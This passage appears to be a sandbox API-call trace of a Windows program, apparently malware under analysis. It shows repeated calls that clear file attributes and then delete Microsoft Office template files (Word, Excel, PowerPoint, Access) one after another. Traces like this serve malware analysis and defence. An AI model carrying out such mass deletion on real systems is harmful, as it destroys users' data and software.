lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\QuizShow.potx", dwFileAttributes=0x80) returned 1 [0097.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\QuizShow.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\quizshow.potx")) returned 1 [0097.545] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\SalesReport.xltx", dwFileAttributes=0x80) returned 1 [0097.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\SalesReport.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\salesreport.xltx")) returned 1 [0097.556] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TASKLIST.XLTX", dwFileAttributes=0x80) returned 1 [0097.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TASKLIST.XLTX" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\tasklist.xltx")) returned 1 [0097.563] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TimeCard.xltx", dwFileAttributes=0x80) returned 1 [0097.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TimeCard.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\timecard.xltx")) returned 1 [0097.573] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Training.potx", dwFileAttributes=0x80) returned 1 [0097.735] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Training.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\training.potx")) returned 1 [0097.740] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanLetter.Dotx", dwFileAttributes=0x80) returned 1 [0097.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanletter.dotx")) returned 1 [0097.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeFax.Dotx", dwFileAttributes=0x80) returned 1 [0097.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanmergefax.dotx")) returned 1 [0097.767] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0097.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeLetter.Dotx", dwFileAttributes=0x80) returned 1 [0097.778] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanmergeletter.dotx")) returned 1 [0097.782] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0098.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanPhotoAlbum.potx", dwFileAttributes=0x80) returned 1 [0098.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanphotoalbum.potx")) returned 1 [0098.305] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0098.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanReport.Dotx", dwFileAttributes=0x80) returned 1 [0098.442] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanreport.dotx")) returned 1 [0098.451] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0098.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanResume.Dotx", dwFileAttributes=0x80) returned 1 [0098.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanresume.dotx")) returned 1 [0098.467] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0098.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\WidescreenPresentation.potx", dwFileAttributes=0x80) returned 1 [0098.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\WidescreenPresentation.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\widescreenpresentation.potx")) returned 1 [0098.489] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0098.489] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0098.490] CoTaskMemFree (pv=0x506980) [0098.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0098.494] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0098.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt", dwFileAttributes=0x80) returned 1 [0098.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Assets.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\assets.accdt")) returned 1 [0098.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0098.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt", dwFileAttributes=0x80) returned 1 [0098.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt")) returned 1 [0098.841] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0098.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt", dwFileAttributes=0x80) returned 1 [0098.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt")) returned 1 [0098.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0098.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt", dwFileAttributes=0x80) returned 1 [0098.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Events.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\events.accdt")) returned 1 [0098.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0099.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt", dwFileAttributes=0x80) returned 1 [0099.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Faculty.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\faculty.accdt")) returned 1 [0099.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0099.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt", dwFileAttributes=0x80) returned 1 [0099.098] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt")) returned 1 [0099.104] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0099.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt", dwFileAttributes=0x80) returned 1 [0099.495] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt")) returned 1 [0099.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0099.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt", dwFileAttributes=0x80) returned 1 [0099.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt")) returned 1 [0099.778] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt", dwFileAttributes=0x80) returned 1 [0100.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\projects.accdt")) returned 1 [0100.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt", dwFileAttributes=0x80) returned 1 [0100.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Sales Pipeline.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\sales pipeline.accdt")) returned 1 [0100.291] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt", dwFileAttributes=0x80) returned 1 [0100.350] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Students.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\students.accdt")) returned 1 [0100.356] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt", dwFileAttributes=0x80) returned 1 [0100.415] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Tasks.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\tasks.accdt")) returned 1 [0100.421] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.421] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.421] CoTaskMemFree (pv=0x506980) [0100.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.425] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.425] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.425] CoTaskMemFree (pv=0x506980) [0100.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.429] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt", dwFileAttributes=0x80) returned 1 [0100.437] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Right.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 right.accdt")) returned 1 [0100.439] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt", dwFileAttributes=0x80) returned 1 [0100.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\1 Top.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\1 top.accdt")) returned 1 [0100.450] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt", dwFileAttributes=0x80) returned 1 [0100.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Right.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 right.accdt")) returned 1 [0100.459] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt", dwFileAttributes=0x80) returned 1 [0100.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\2 Top.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\2 top.accdt")) returned 1 [0100.469] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt", dwFileAttributes=0x80) returned 1 [0100.474] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\comments.accdt")) returned 1 [0100.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt", dwFileAttributes=0x80) returned 1 [0100.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\contacts.accdt")) returned 1 [0100.513] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt", dwFileAttributes=0x80) returned 1 [0100.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\details.accdt")) returned 1 [0100.523] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt", dwFileAttributes=0x80) returned 1 [0100.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\dialog.accdt")) returned 1 [0100.531] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt", dwFileAttributes=0x80) returned 1 [0100.539] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\issues.accdt")) returned 1 [0100.542] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt", dwFileAttributes=0x80) returned 1 [0100.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\list.accdt")) returned 1 [0100.561] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt", dwFileAttributes=0x80) returned 1 [0100.567] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\media.accdt")) returned 1 [0100.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt", dwFileAttributes=0x80) returned 1 [0100.578] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\msgbox.accdt")) returned 1 [0100.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt", dwFileAttributes=0x80) returned 1 [0100.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tabs.accdt")) returned 1 [0100.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt", dwFileAttributes=0x80) returned 1 [0100.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tasks.accdt")) returned 1 [0100.600] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 